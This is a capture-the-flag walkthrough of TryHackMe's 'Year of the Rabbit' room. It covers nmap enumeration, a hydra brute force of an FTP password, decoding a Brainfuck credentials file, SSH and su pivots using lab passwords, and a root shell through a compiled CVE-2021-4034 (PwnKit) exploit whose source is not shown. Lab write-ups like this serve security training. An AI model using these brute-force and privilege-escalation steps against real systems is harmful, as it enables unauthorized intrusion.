I"å.<p>This is the <a href="https://tryhackme.com/room/yearoftherabbit">tryhackme</a> room with difficult level <code class="language-plaintext highlighter-rouge">easy</code>.</p>

<h3 id="enumeration">Enumeration.</h3>
<h4 id="nmap-scanning">nmap scanning.</h4>

<p><strong>Command.</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre> nmap -sC -sV 10.10.59.107 -oN nmap-scan 
</pre></td></tr></tbody></table></code></pre></div></div>

<p><strong>Results</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td> --><td class="rouge-code"><pre># Nmap 7.92 scan initiated Fri May 20 22:37:30 2022 as: nmap -sC -sV -oN nmap-scan 10.10.59.107
Nmap scan report for 10.10.59.107
Host is up (0.16s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|   2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|   256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_  256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.10 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 20 22:38:15 2022 -- 1 IP address (1 host up) scanned in 45.31 seconds
</pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="burp-suit">Burp-suit.</h4>

<p><img src="burp.png" alt="" /></p>

<p><strong>Visit  the hidden directory</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre>GET /intermediary.php?hidden_directory=/WExYY2Cv-qU 
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Then navigate to <code class="language-plaintext highlighter-rouge">http://thm-machine-ip/WExYY2Cv-qU/</code></p>

<p>This will lead us to the directory which has an image named as <code class="language-plaintext highlighter-rouge">Hot_Babe.png.</code> I renamed it to <code class="language-plaintext highlighter-rouge">bae.png.</code>
<img src="bae.png" alt="" /></p>

<p><strong>Checking if there is any message in the image.</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/thm/yearOfrabbit]
‚îî‚îÄ$ strings bae.png
</pre></td></tr></tbody></table></code></pre></div></div>
<p>We found a message as shown below.</p>

<blockquote>
  <p>[!note] message from image
Eh, you‚Äôve earned this. Username for FTP is ftpuser
One of these is the password:</p>
</blockquote>

<h3 id="brute-force-ftp-password">Brute-force ftp password.</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/thm/yearOfrabbit]
‚îî‚îÄ$ hydra -l ftpuser -P "ftp-passwds" -s 21 -o "ftp-results" ftp://10.10.59.107 
</pre></td></tr></tbody></table></code></pre></div></div>
<p><strong>Result.</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre>password: 5iez1wGXKfPKQ
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="login-to-ftp-server">Login to ftp server.</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/thm/yearOfrabbit]
‚îî‚îÄ$ ftp 10.10.59.107
Connected to 10.10.59.107.
220 (vsFTPd 3.0.2)
Name (10.10.59.107:egovridc): ftpuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
</pre></td></tr></tbody></table></code></pre></div></div>

<p><strong>List ftp files.</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td> --><td class="rouge-code"><pre>ftp&gt; ls 
229 Entering Extended Passive Mode (|||33780|).
150 Here comes the directory listing.
-rw-r--r--    1 0        0             758 Jan 23  2020 Eli's_Creds.txt
226 Directory send OK.
</pre></td></tr></tbody></table></code></pre></div></div>

<p><strong>Download  Eli‚Äôs_Creds.txt from ftp server.</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>ftp&gt; get Eli's_Creds.txt
local: Eli's_Creds.txt remote: Eli's_Creds.txt
229 Entering Extended Passive Mode (|||12303|).
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
100% |*************************************************************************|   758      622.04 KiB/s    00:00 ETA
226 Transfer complete.
758 bytes received in 00:00 (4.46 KiB/s)
ftp&gt; 
</pre></td></tr></tbody></table></code></pre></div></div>

<p><strong>Reading Eli‚Äôs_Creds.txt.</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/thm/yearOfrabbit]
‚îî‚îÄ$ cat Eli\'s_Creds.txt 
+++++ ++++[ -&gt;+++ +++++ +&lt;]&gt;+ +++.&lt; +++++ [-&gt;++ +++&lt;] &gt;++++ +.&lt;++ +[-&gt;-
--&lt;]&gt; ----- .&lt;+++ [-&gt;++ +&lt;]&gt;+ +++.&lt; +++++ ++[-&gt; ----- --&lt;]&gt; ----- --.&lt;+
++++[ -&gt;--- --&lt;]&gt; -.&lt;++ +++++ +[-&gt;+ +++++ ++&lt;]&gt; +++++ .++++ +++.- --.&lt;+
+++++ +++[- &gt;---- ----- &lt;]&gt;-- ----- ----. ---.&lt; +++++ +++[- &gt;++++ ++++&lt;
]&gt;+++ +++.&lt; ++++[ -&gt;+++ +&lt;]&gt;+ .&lt;+++ +[-&gt;+ +++&lt;] &gt;++.. ++++. ----- ---.+
++.&lt;+ ++[-&gt; ---&lt;] &gt;---- -.&lt;++ ++++[ -&gt;--- ---&lt;] &gt;---- --.&lt;+ ++++[ -&gt;---
--&lt;]&gt; -.&lt;++ ++++[ -&gt;+++ +++&lt;] &gt;.&lt;++ +[-&gt;+ ++&lt;]&gt; +++++ +.&lt;++ +++[- &gt;++++
+&lt;]&gt;+ +++.&lt; +++++ +[-&gt;- ----- &lt;]&gt;-- ----- -.&lt;++ ++++[ -&gt;+++ +++&lt;] &gt;+.&lt;+
++++[ -&gt;--- --&lt;]&gt; ---.&lt; +++++ [-&gt;-- ---&lt;] &gt;---. &lt;++++ ++++[ -&gt;+++ +++++
&lt;]&gt;++ ++++. &lt;++++ +++[- &gt;---- ---&lt;] &gt;---- -.+++ +.&lt;++ +++++ [-&gt;++ +++++
&lt;]&gt;+. &lt;+++[ -&gt;--- &lt;]&gt;-- ---.- ----. &lt;
</pre></td></tr></tbody></table></code></pre></div></div>

<p>The file is obfuscated  with brainfuck, so i decided to use online <a href="https://www.dcode.fr/brainfuck-language">brainfuck</a> tool to decrypt.</p>

<p><strong>Results</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>User: eli
Password: DSpDiM1wAEwid
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="login-into-elis-machine-by-using-ssh">Login into Eli‚Äôs machine by using ssh.</h3>

<p><strong>ssh</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/C7F5/thm/yearOfrabbit]
‚îî‚îÄ$ ssh eli@10.10.59.107 
</pre></td></tr></tbody></table></code></pre></div></div>

<blockquote>
  <p>[!FAQ] message from root
1 new message</p>

  <p>Message from Root to Gwendoline:
‚ÄúGwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I‚Äôve left you a hidden message there‚Äù</p>

  <p>END MESSAGE</p>
</blockquote>

<h3 id="user-privilege-escalation">User privilege escalation.</h3>

<h4 id="find-secret-message-from-root">Find secret message from root.</h4>

<p><strong>s3cr3t</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>eli@year-of-the-rabbit:~$ find /  -name *s3cr3t* 2&gt;/dev/null
/var/www/html/sup3r_s3cr3t_fl4g.php
/usr/games/s3cr3t
</pre></td></tr></tbody></table></code></pre></div></div>

<p><strong>Reading the file.</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td> --><td class="rouge-code"><pre>eli@year-of-the-rabbit:/usr/games/s3cr3t$ cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\! 
Your password is awful, Gwendoline. 
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!

Yours sincerely
   -Root
</pre></td></tr></tbody></table></code></pre></div></div>
<p>It contains password for user gwendoline.</p>

<p><strong>Switch to user gwendoline.</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre>eli@year-of-the-rabbit:/usr/games/s3cr3t$ su gwendoline
Password: 
gwendoline@year-of-the-rabbit:/usr/games/s3cr3t$ whoami
gwendoline
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="root-privilege-escalation">Root privilege escalation.</h3>

<p><code class="language-plaintext highlighter-rouge">CVE-2021-4034</code>
Send the files to the victim machine and run <code class="language-plaintext highlighter-rouge">make</code> then <code class="language-plaintext highlighter-rouge">exploit</code>
Results.</p>

<p><strong>Root user</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre>gwendoline@year-of-the-rabbit:~$ make
gcc -shared -o evil.so -fPIC evil-so.c
gcc exploit.c -o exploit
gwendoline@year-of-the-rabbit:~$ ls
evil.so  evil-so.c  exploit  exploit.c  Makefile  user.txt
gwendoline@year-of-the-rabbit:~$ ./exploit 
# cd /root
# ls
root.txt
# cat root.txt
THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}
# 
</pre></td></tr></tbody></table></code></pre></div></div>

<p><strong>End.</strong>
Relate [[Chill Hack]]</p>
:ET